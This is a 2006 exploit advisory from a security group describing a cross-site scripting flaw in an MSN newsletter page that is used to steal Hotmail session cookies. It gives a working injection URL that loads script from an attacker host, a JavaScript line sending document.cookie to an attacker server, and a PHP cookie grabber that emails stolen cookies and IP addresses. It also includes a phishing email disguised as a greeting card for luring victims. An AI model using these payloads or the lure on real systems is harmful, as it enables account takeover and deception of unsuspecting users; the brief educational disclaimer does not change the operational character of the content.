Hotmail/MSN Cross Site Scripting Exploit

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
browsers)

Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP to exploit the 'RE' variable in
newsletters.msn.com/xs-v3/insite.asp
cross site scripting vulnerability inside MSN.com website. Exploit
requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering
skills are required too


Exploitation:


Exploiting this vulnerability can be done by uploading the following
script to a php enabled
webserver then send an email to the victim with
http://http://www.attacker-server.com/ecard.php
the link of the script that redirect to vulnerable msn site , so as an
example the email can be
sent as a greeting card with the following
HTML code, you may also need to modify some things on the ecard.php
exploit to make it fit your needs.

Hello, </p>
Alias has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php"> http://
lycos.americangreetings.com/view.pd?i=197484541&amp;m=8381&amp;rr=y&amp;source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com




 ------------------------ Hotmail/MSN accounts XSS Xploit by Simo64
---------------------- */

Exploit :

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script
src=http://attacker/redir.js>

WHERE redir.js code is :

location.href='http://attacker-site/a.php?cookie='+escape(document.cookie)

and a.php as cookie grabber may use the following code:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location:
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");
?>


ecrad.php page may contain a simple php or javascript rediretion to
exploit link :)


Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing
this information is entirely on your OWN risk. The information provided in
this advisory is to be used/tested on your
OWN machine/Account. I cannot be held responsible for any of the above.